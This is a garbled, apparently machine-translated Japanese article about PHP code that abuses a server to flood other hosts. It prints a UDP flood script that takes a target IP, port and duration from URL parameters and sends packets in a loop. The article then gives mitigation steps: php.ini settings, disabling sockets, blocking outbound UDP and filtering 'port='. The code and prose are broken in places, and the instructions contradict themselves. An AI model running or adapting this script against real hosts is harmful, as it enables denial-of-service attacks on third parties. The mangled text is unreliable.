PHP コードを DOS に使用して、ユーザーがネットワーク帯域幅を使い果たさないようにする

PHP コードを使用してソケットを呼び出し、サーバーのネットワークを直接使用して他の IP を攻撃します。 一般的なコードは次のとおりです。

コードをコピーします コードは次のとおりです。 🎜>

$packets = 0;
$ip = $_GET['ip'];
$_GET['port']; 🎜>ignore_user_abort(FALSE) ;
$exec_time = $_GET['time'];
$time = time();
print "ポート $rand
"; 🎜>$max_time = $ time $exec_time;
for($i=0;$i$out .= "X">}
while(1) ){
$ パケット ;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$ip", $rand , $errno, $errstr , 5);
if($fp){
fwrite($fp, $out);
}
; >echo "パケットは ".time('h:i:s') に完了しました。" with $packets (" .round(($packets*65)/1024, 2) . " mB) パケットの平均 Round($) packets/$exec_time, 2 ) . " packets/s \n";



機能:

IIS がオンになるとすぐに、サーバーの送信帯域幅が使い果たされています -- つまり、サーバーが他のサーバーにパケットを送信し続ける状況は、DDOS が大量のデータ パケットを受信し続ける状況とは異なります。 >解決策:

上記のコードを禁止します:
c:windowsphp.ini に設定します:

disable_functions =gzinflate;
c:windowsphp.ini の値を Off に設定します allow_url_fopen = オフ
そして: ;extension =php_sockets.dll
その前に ; 記号が必要です。これは、sockets.dll の使用を維持する必要があることを意味します。 🎜> その後、IIS を再起動します
上記の方法がまだ存在する場合は、IIS の許可された拡張機能で PHP 拡張機能のテストを無効にすることができます。
さらに、暗号化されていない PHP 攻撃コードの場合は、次のコマンドを使用することもできます。対処方法:
1. IP ポリシーまたはファイアウォールで、すべての UDP の送信を禁止します。
2. SQL インターセプトおよび URL インターセプトで、キーワード port= をインターセプトします。